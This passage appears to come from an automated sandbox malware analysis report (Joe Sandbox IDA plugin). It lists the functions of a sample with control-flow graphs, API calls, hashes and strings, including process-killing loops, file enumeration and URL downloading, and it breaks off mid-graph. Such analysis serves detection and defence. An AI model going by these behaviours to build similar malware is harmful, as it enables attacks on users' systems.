                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00373990: std::locale::_Init.LIBCPMT ref: 003739F9
                                                                                                                                                                                            • NtCreateFile.NTDLL ref: 00373D3F
                                                                                                                                                                                            • GetProcessHeap.KERNEL32(?,?,?), ref: 00373D5F
                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00373D69
                                                                                                                                                                                            • NtReadFile.NTDLL ref: 00373D9B
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileHeap$AllocateCreateInitProcessReadstd::locale::_
                                                                                                                                                                                            • String ID: :p5$@$Kernel32.dll$ntdll.dll
                                                                                                                                                                                            • API String ID: 2125253174-4168157494
                                                                                                                                                                                            • Opcode ID: 7cbc073d39940dce6c33a97dc180a86ff72f6ba45d3d18fb2e5dc0cd1b52195c
                                                                                                                                                                                            • Instruction ID: 33f8d3c9d42ef2d6af014c06d797d7b2c0720253e7b53b131c869c5bc8fe17ed
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7cbc073d39940dce6c33a97dc180a86ff72f6ba45d3d18fb2e5dc0cd1b52195c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E61A371E002089BDF26DFA4DC85BEEB7B9EF49310F108219F505BB290DB38AA45CB54
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0035CE40 Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 652filesleepCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 4041 35ce40-35cefb call 355dd0 call 356f10 call 35e940 call 35f110 call 360bb0 call 35f110 4054 35cf01-35cf4f call 356f10 call 35e940 4041->4054 4055 35d07e-35d09d call 35f7b0 4041->4055 4064 35cf55-35cf5e 4054->4064 4065 35d79e call 37b1dd 4054->4065 4060 35d0a1-35d0c1 FindFirstFileA 4055->4060 4061 35d09f 4055->4061 4069 35d131-35d149 4060->4069 4070 35d0c3-35d0d0 4060->4070 4061->4060 4067 35cf60 4064->4067 4068 35cf62-35cfa1 call 356f10 call 35f7b0 call 360fc0 4064->4068 4072 35d7a3 call 380fd8 4065->4072 4067->4068 4110 35cfd0-35cfef 4068->4110 4111 35cfa3-35cfb0 4068->4111 4073 35d537-35d59c call 36d5a0 call 376750 call 356f10 call 3564a0 4069->4073 4074 35d14f-35d157 4069->4074 4076 35d127-35d12e call 374ea2 4070->4076 4077 35d0d2-35d0e0 4070->4077 4082 35d7a8 call 380fd8 4072->4082 4129 35d59e-35d5ab 4073->4129 4130 35d5cb-35d5f4 call 35eb40 call 356560 4073->4130 4079 35d160-35d168 4074->4079 4076->4069 4081 35d0e6 4077->4081 4077->4082 4085 35d4ff-35d51d FindNextFileA 4079->4085 4086 35d16e-35d17a 4079->4086 4081->4076 4092 35d7ad call 380fd8 4082->4092 4085->4079 4101 35d523-35d535 4085->4101 4091 35d180-35d184 4086->4091 4096 35d186-35d188 4091->4096 4097 35d1a0-35d1a2 4091->4097 4104 35d7b2-35d7b7 call 380fd8 4092->4104 4102 35d19c-35d19e 4096->4102 4103 35d18a-35d190 4096->4103 4106 35d1a5-35d1a7 4097->4106 4101->4073 4102->4106 4103->4097 4108 35d192-35d19a 4103->4108 4106->4085 4112 35d1ad-35d1b9 4106->4112 4108->4091 4108->4102 4119 35cff1-35cffe 4110->4119 4120 35d01e-35d02d call 35cd00 4110->4120 4116 35cfc6-35cfcd call 374ea2 4111->4116 4117 35cfb2-35cfc0 4111->4117 4118 35d1c0-35d1c4 4112->4118 4116->4110 4117->4072 4117->4116 4127 35d1c6-35d1c8 4118->4127 4128 35d1e0-35d1e2 4118->4128 4122 35d014-35d01b call 374ea2 4119->4122 4123 35d000-35d00e 4119->4123 4142 35d033-35d03d call 357000 4120->4142 4143 35d0e8-35d0f2 4120->4143 4122->4120 4123->4072 4123->4122 4135 35d1dc-35d1de 4127->4135 4136 35d1ca-35d1d0 4127->4136 4132 35d1e5-35d1e7 4128->4132 4137 35d5c1-35d5c8 call 374ea2 4129->4137 4138 35d5ad-35d5bb 4129->4138 4166 35d5f6-35d610 call 354db0 4130->4166 4167 35d663-35d668 4130->4167 4132->4085 4140 35d1ed-35d25d call 35f7b0 call 35ecd0 4132->4140 4135->4132 4136->4128 4144 35d1d2-35d1da 4136->4144 4137->4130 4138->4104 4138->4137 4170 35d28c-35d2fe call 35f7b0 call 35ed40 4140->4170 4171 35d25f-35d26c 4140->4171 4154 35d042-35d04c 4142->4154 4149 35d788-35d79b call 374a11 4143->4149 4150 35d0f8-35d108 4143->4150 4144->4118 4144->4135 4155 35d77e-35d785 call 374ea2 4150->4155 4156 35d10e-35d11c 4150->4156 4154->4055 4161 35d04e-35d05e 4154->4161 4155->4149 4156->4092 4162 35d122 4156->4162 4168 35d074-35d07b call 374ea2 4161->4168 4169 35d060-35d06e 4161->4169 4162->4155 4185 35d612-35d616 4166->4185 4186 35d618-35d61c 4166->4186 4173 35d690-35d6d0 call 356f10 call 356ad0 4167->4173 4174 35d66a-35d683 call 354400 call 353aa0 call 37b1b7 4167->4174 4168->4055 4169->4092 4169->4168 4202 35d300-35d30d 4170->4202 4203 35d32d-35d33c call 35cd00 4170->4203 4177 35d282-35d289 call 374ea2 4171->4177 4178 35d26e-35d27c 4171->4178 4199 35d6d5-35d6e8 4173->4199 4207 35d688-35d68b 4174->4207 4177->4170 4178->4072 4178->4177 4185->4186 4189 35d63c-35d645 call 37a107 4185->4189 4186->4189 4190 35d61e-35d623 4186->4190 4204 35d64a-35d660 call 376ca0 4189->4204 4190->4189 4196 35d625-35d639 call 37b078 call 37a0d0 4190->4196 4196->4189 4205 35d71b-35d71d 4199->4205 4206 35d6ea-35d6f7 4199->4206 4209 35d323-35d32a call 374ea2 4202->4209 4210 35d30f-35d31d 4202->4210 4226 35d342-35d3c2 call 356f10 call 35e940 call 35f110 call 360bb0 call 35f110 4203->4226 4227 35d46c-35d476 4203->4227 4204->4167 4215 35d72f-35d75a call 37b1b7 4205->4215 4216 35d71f-35d72a Sleep 4205->4216 4213 35d70d-35d718 call 374ea2 4206->4213 4214 35d6f9-35d707 4206->4214 4207->4173 4209->4203 4210->4072 4210->4209 4213->4205 4214->4072 4214->4213 4215->4149 4246 35d75c-35d76c 4215->4246 4216->4173 4254 35d3d4-35d458 call 356f10 call 35e940 call 35f110 call 360bb0 call 35f110 4226->4254 4255 35d3c4-35d3cf call 35b4b0 4226->4255 4229 35d4a8-35d4d0 4227->4229 4230 35d478-35d488 4227->4230 4229->4085 4235 35d4d2-35d4df 4229->4235 4233 35d49e-35d4a5 call 374ea2 4230->4233 4234 35d48a-35d498 4230->4234 4233->4229 4234->4072 4234->4233 4238 35d4f5-35d4fc call 374ea2 4235->4238 4239 35d4e1-35d4ef 4235->4239 4238->4085 4239->4072 4239->4238 4246->4155 4249 35d76e-35d77c 4246->4249 4249->4104 4249->4155 4267 35d467-35d468 4254->4267 4268 35d45a-35d462 call 359630 4254->4268 4255->4254 4267->4227 4268->4267
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FindFirstFileA.KERNELBASE ref: 0035D0B2
                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 0035D519
                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8,?,00000000,?,?), ref: 0035D724
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileFind$FirstNextSleep
                                                                                                                                                                                            • String ID: /Up/b$@$MyApp/1.0$ntdll.dll
                                                                                                                                                                                            • API String ID: 2635277345-838716244
                                                                                                                                                                                            • Opcode ID: 47645c5f7ea5cf50fe835b9c1ddddd7ae83a723e5e3cd36bc5298ccea93c9855
                                                                                                                                                                                            • Instruction ID: 8d7afd45cd06e5370368e9b50ae1fb5210511040f85c9f4870497adb15e55293
                                                                                                                                                                                            • Opcode Fuzzy Hash: 47645c5f7ea5cf50fe835b9c1ddddd7ae83a723e5e3cd36bc5298ccea93c9855
                                                                                                                                                                                            • Instruction Fuzzy Hash: E532F4715083808FD72ADF24C845F6FB7E1BF85305F148A1CF8858B6A2EB75D5898B92
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003741E0 Relevance: 12.2, APIs: 8, Instructions: 160sleepprocessCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 4270 3741e0-37422b CreateToolhelp32Snapshot Process32FirstW 4271 3743b6-3743d0 CloseHandle Sleep call 374a11 4270->4271 4272 374231-374260 call 373990 4270->4272 4275 3743d5-3743d8 4271->4275 4277 374267-374270 4272->4277 4277->4277 4278 374272-374290 call 36eb70 4277->4278 4281 374294-3742b4 4278->4281 4282 374292 4278->4282 4283 3742b6-3742b8 4281->4283 4284 3742e9 4281->4284 4282->4281 4285 3742da-3742e1 4283->4285 4286 3742ba-3742bc 4283->4286 4287 3742f0-3742f3 4284->4287 4285->4287 4288 3742c0-3742ca 4286->4288 4289 3742f5-374304 4287->4289 4290 374324-37432d 4287->4290 4295 3742e3 4288->4295 4296 3742cc-3742d2 4288->4296 4291 374306-374314 4289->4291 4292 37431a-374321 call 374ea2 4289->4292 4293 374364-37436b 4290->4293 4294 37432f-374344 4290->4294 4291->4292 4297 3743db-3743e0 call 380fd8 4291->4297 4292->4290 4302 374393-3743a9 Process32NextW 4293->4302 4303 37436d-374381 OpenProcess 4293->4303 4299 374346-374354 4294->4299 4300 37435a-374361 call 374ea2 4294->4300 4295->4284 4296->4288 4301 3742d4 4296->4301 4299->4297 4299->4300 4300->4293 4301->4285 4302->4271 4308 3743ab-3743b1 4302->4308 4303->4302 4307 374383-37438d TerminateProcess CloseHandle 4303->4307 4307->4302 4308->4272
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00374203
                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00374223
                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?,?,?,?), ref: 00374377
                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?), ref: 00374386
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0037438D
                                                                                                                                                                                            • Process32NextW.KERNEL32(?,0000022C), ref: 003743A1
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003743B7
                                                                                                                                                                                            • Sleep.KERNELBASE(000003E8), ref: 003743C2
                                                                                                                                                                                              • Part of subcall function 00373990: std::locale::_Init.LIBCPMT ref: 003739F9
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseHandleProcessProcess32$CreateFirstInitNextOpenSleepSnapshotTerminateToolhelp32std::locale::_
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2916365046-0
                                                                                                                                                                                            • Opcode ID: 439b53793e0593b63cb513bec675a7da5446332a024882476641b8efd92a6ee9
                                                                                                                                                                                            • Instruction ID: 4a2cc428a2a59c132ca01f153c16b811626db4d748539177df75c6c7b3cfae23
                                                                                                                                                                                            • Opcode Fuzzy Hash: 439b53793e0593b63cb513bec675a7da5446332a024882476641b8efd92a6ee9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F51D3359052288BDB369F24DCCDBADB778EB44301F1085D9E90EA7291D739AE94CF50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0036F560 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 186networkfilesleepCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 4311 36f560-36f682 call 374780 call 374650 * 3 4328 36f686-36f6ab InternetOpenUrlA 4311->4328 4329 36f684 4311->4329 4331 36f6e2-36f70b InternetReadFile 4328->4331 4332 36f6ad-36f6c8 Sleep call 36f560 4328->4332 4329->4328 4337 36f7b3-36f7f9 call 374a11 4331->4337 4338 36f711-36f719 4331->4338 4334 36f6cd-36f6df call 374a11 4332->4334 4338->4337 4340 36f71f-36f726 4338->4340 4342 36f728-36f757 call 376ca0 4340->4342 4343 36f759-36f76d call 35ff80 4340->4343 4348 36f772-36f7a0 InternetReadFile 4342->4348 4343->4348 4348->4337 4352 36f7a2-36f7ae 4348->4352 4352->4338
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00374780: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,00000000,811C9DC5,00000000), ref: 00374832
                                                                                                                                                                                            • InternetOpenUrlA.WININET ref: 0036F69D
                                                                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 0036F6B2
                                                                                                                                                                                            • InternetReadFile.WININET ref: 0036F707
                                                                                                                                                                                            • InternetReadFile.WININET ref: 0036F79C
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Internet$FileRead$ByteCharMultiOpenSleepWide
                                                                                                                                                                                            • String ID: Kernel32.dll$Wininet.dll
                                                                                                                                                                                            • API String ID: 4155548564-3787353695
                                                                                                                                                                                            • Opcode ID: 231bcdb5fb10feb4ca5710f31c17539302797a9d827b6743bbc4acb68bc57c82
                                                                                                                                                                                            • Instruction ID: 23fb4c93c6a498fd0444a917d2c9c0e0b1be4847d9feeef41f3681e01c63cd98
                                                                                                                                                                                            • Opcode Fuzzy Hash: 231bcdb5fb10feb4ca5710f31c17539302797a9d827b6743bbc4acb68bc57c82
                                                                                                                                                                                            • Instruction Fuzzy Hash: AB7175B5A011289FCB21DF24CC85B9DB7B8EF48310F4041EAE609B7251DB70AE85CF98
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00357A49 Relevance: 10.6, APIs: 3, Strings: 2, Instructions: 1828COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE ref: 00357C0B
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                            • String ID: \Ext\$inc
                                                                                                                                                                                            • API String ID: 3188754299-3864405785
                                                                                                                                                                                            • Opcode ID: a8b21051f99f12663e274a7a79f75234485b5f6902037e07aed83f927b39ba70
                                                                                                                                                                                            • Instruction ID: 06c4e1d3d5aa37cefd915bc6bc13c53115e9bb3b49530665d8a85496ead3502d
                                                                                                                                                                                            • Opcode Fuzzy Hash: a8b21051f99f12663e274a7a79f75234485b5f6902037e07aed83f927b39ba70
                                                                                                                                                                                            • Instruction Fuzzy Hash: DFF2D6719102148FDB1EDF24CC99FADB772BF45301F148699E8096B6B2DB749AC98F40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00357A4E Relevance: 10.6, APIs: 3, Strings: 2, Instructions: 1827COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE ref: 00357C0B
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                            • String ID: \Ext\$inc
                                                                                                                                                                                            • API String ID: 3188754299-3864405785
                                                                                                                                                                                            • Opcode ID: 151b9157c63f50dd6448af1184d540cbb18a77d35e03b49ed1164a1405820dda
                                                                                                                                                                                            • Instruction ID: 015f72206ef77bc42f323c2c075f7bce1db4ca6fb13059c4d2cd765298a3fd3d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 151b9157c63f50dd6448af1184d540cbb18a77d35e03b49ed1164a1405820dda
                                                                                                                                                                                            • Instruction Fuzzy Hash: 82F2D571A102148FDB1EDF24CC99FADB772BF45301F148699E8096B6B2DB749AC98F40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00387A30 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 408timeCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 7769 387a30-387a64 call 387377 call 38737d call 3873db 7776 387a6a-387a76 call 387383 7769->7776 7777 387cb7-387cf2 call 380ff5 call 387377 call 38737d call 3873db 7769->7777 7776->7777 7783 387a7c-387a86 7776->7783 7808 387cf8-387d04 call 387383 7777->7808 7809 387e11-387e68 call 380ff5 call 387972 7777->7809 7785 387a88 7783->7785 7786 387ab9-387abb 7783->7786 7789 387a8a-387a90 7785->7789 7787 387abe-387ac7 7786->7787 7787->7787 7790 387ac9-387adf call 38665c 7787->7790 7792 387ab0-387ab2 7789->7792 7793 387a92-387a95 7789->7793 7803 387aef-387b03 call 38524e 7790->7803 7804 387ae1-387ae9 call 38524e 7790->7804 7798 387ab5-387ab7 7792->7798 7796 387aac-387aae 7793->7796 7797 387a97-387a9f 7793->7797 7796->7798 7797->7792 7802 387aa1-387aaa 7797->7802 7798->7786 7799 387aea-387aee 7798->7799 7802->7789 7802->7796 7815 387b06-387b10 7803->7815 7804->7799 7808->7809 7819 387d0a-387d16 call 3873af 7808->7819 7827 387e78 7809->7827 7828 387e6a-387e6d 7809->7828 7815->7815 7818 387b12-387b26 call 38a818 7815->7818 7829 387b2c-387b78 call 376750 * 4 call 3879e9 7818->7829 7830 387cb5 7818->7830 7819->7809 7826 387d1c-387d3d call 38524e GetTimeZoneInformation 7819->7826 7841 387dee-387e10 call 387371 call 387365 call 38736b 7826->7841 7842 387d43-387d63 7826->7842 7834 387e7d-387e91 call 38524e call 374a11 7827->7834 7835 387e78 call 387cc2 7827->7835 7828->7827 7833 387e6f-387e76 call 387a30 7828->7833 7871 387b79-387b7c 7829->7871 7830->7777 7833->7834 7835->7834 7846 387d6d-387d75 7842->7846 7847 387d65-387d6a 7842->7847 7851 387d87-387d89 7846->7851 7852 387d77-387d7e 7846->7852 7847->7846 7857 387d8b-387deb call 376750 * 4 call 384280 call 387e92 * 2 7851->7857 7852->7851 7856 387d80-387d85 7852->7856 7856->7857 7857->7841 7873 387b7e 7871->7873 7874 387b81-387b84 7871->7874 7873->7874 7874->7871 7876 387b86-387b94 7874->7876 7878 387b99-387bae call 37f293 7876->7878 7879 387b96 7876->7879 7884 387bb1-387bb7 7878->7884 7879->7878 7886 387bb9-387bc0 7884->7886 7887 387bc2-387bc5 7884->7887 7886->7887 7889 387bc7-387bcd 7886->7889 7887->7884 7891 387bd3-387bfe call 37f293 7889->7891 7892 387c67-387c6e 7889->7892 7901 387c20-387c26 7891->7901 7902 387c00-387c04 7891->7902 7894 387c70-387c72 7892->7894 7895 387c75-387c86 7892->7895 7894->7895 7897 387c88-387c9c call 3879e9 7895->7897 7898 387c9f-387cae call 387371 call 387365 7895->7898 7897->7898 7898->7830 7901->7892 7907 387c28-387c4b call 37f293 7901->7907 7905 387c05-387c0b 7902->7905 7908 387c1d 7905->7908 7909 387c0d-387c1b 7905->7909 7907->7892 7914 387c4d-387c51 7907->7914 7908->7901 7909->7905 7909->7908 7915 387c52-387c55 7914->7915 7916 387c64 7915->7916 7917 387c57-387c62 7915->7917 7916->7892 7917->7915 7917->7916
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00387E75,00000000,00000000,00000000), ref: 00387D34
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InformationTimeZone
                                                                                                                                                                                            • String ID: W. Europe Standard Time$W. Europe Summer Time$u~8$}~8
                                                                                                                                                                                            • API String ID: 565725191-1817765445
                                                                                                                                                                                            • Opcode ID: 54f3291e7f34a366396db0787630bf5843adc170e0ea142cc7a901fdd8b25bf2
                                                                                                                                                                                            • Instruction ID: cac8c5e935a9df54b6b02a0e59e67790c6b22ab29bb5b605115c6156648fbac8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 54f3291e7f34a366396db0787630bf5843adc170e0ea142cc7a901fdd8b25bf2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CC12572904311ABDB27BB64DC42ABE77BAEF04750F2540A6F901EB291EB70DE40D790
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003648B3 Relevance: 5.5, Strings: 4, Instructions: 499COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 7979 3648b3-3648bf call 366fc0 7981 3648c4-3648d0 7979->7981 7982 3648d2-3648d8 7981->7982 7983 3648da-3648e3 call 368f50 7981->7983 7984 3648e8-3648f6 call 3619f0 7982->7984 7983->7984 7988 364901-364904 7984->7988 7989 3648f8-3648fc 7984->7989 7991 3651ca-365245 call 356f10 call 3612d0 call 364590 call 3617f0 7988->7991 7992 36490a-36492d call 366610 call 3619f0 7988->7992 7990 364ef0-364ef9 7989->7990 7994 364eff-364f16 7990->7994 7995 36555a-36555f 7990->7995 8035 3657b5-3657ba call 37b1dd * 2 7991->8035 8036 36524b-365270 call 35edc0 call 356470 call 35edc0 7991->8036 8015 364933-364944 call 361d70 7992->8015 8016 36511f-36519a call 356f10 call 3612d0 call 364590 call 3617f0 7992->8016 7999 364f3a-364f41 7994->7999 8000 364f18-364f20 7994->8000 7998 36561a-36563d call 361990 call 374a11 7995->7998 8006 364f44-364f4a 7999->8006 8004 364f22-364f36 8000->8004 8005 364f38 8000->8005 8004->8006 8005->7999 8008 364f5f-364f65 8006->8008 8009 364f4c-364f5d 8006->8009 8013 364f68-364f77 8008->8013 8009->8013 8019 364f7d-364f88 call 3619f0 8013->8019 8020 365029-365034 call 3619f0 8013->8020 8027 364949-364954 call 3619f0 8015->8027 8091 3657b0 call 37b1dd 8016->8091 8092 3651a0-3651c5 call 35edc0 call 356470 call 35edc0 8016->8092 8019->8027 8039 364f8e-364f91 8019->8039 8037 3650d2-3650e0 call 3619f0 8020->8037 8038 36503a-36503d 8020->8038 8048 3648a0-3648a6 8027->8048 8083 3657bf-365809 call 37b1dd 8035->8083 8117 365610-365615 call 35edc0 8036->8117 8064 3650e6-365109 call 366610 call 3619f0 8037->8064 8065 3654e8-365555 call 356f10 call 3612d0 call 364590 8037->8065 8044 365043-365065 8038->8044 8045 3653bb-365428 call 356f10 call 3612d0 call 364590 8038->8045 8046 364f97-364fb9 8039->8046 8047 365300-365366 call 356f10 call 3612d0 call 364590 8039->8047 8056 365067-36506f 8044->8056 8057 365089-365090 8044->8057 8120 36536d-36537e call 3617f0 8045->8120 8058 364fdd-364fe4 8046->8058 8059 364fbb-364fc3 8046->8059 8047->8120 8052 36573e-3657a4 call 356f10 call 3612d0 call 364590 8048->8052 8053 3648ac 8048->8053 8053->8052 8068 365087 8056->8068 8069 365071-365085 8056->8069 8072 365093-365099 8057->8072 8073 364fe7-364fed 8058->8073 8070 364fc5-364fd9 8059->8070 8071 364fdb 8059->8071 8121 36510f-36511a call 3619f0 8064->8121 8122 36542d-365493 call 356f10 call 3612d0 call 364590 8064->8122 8132 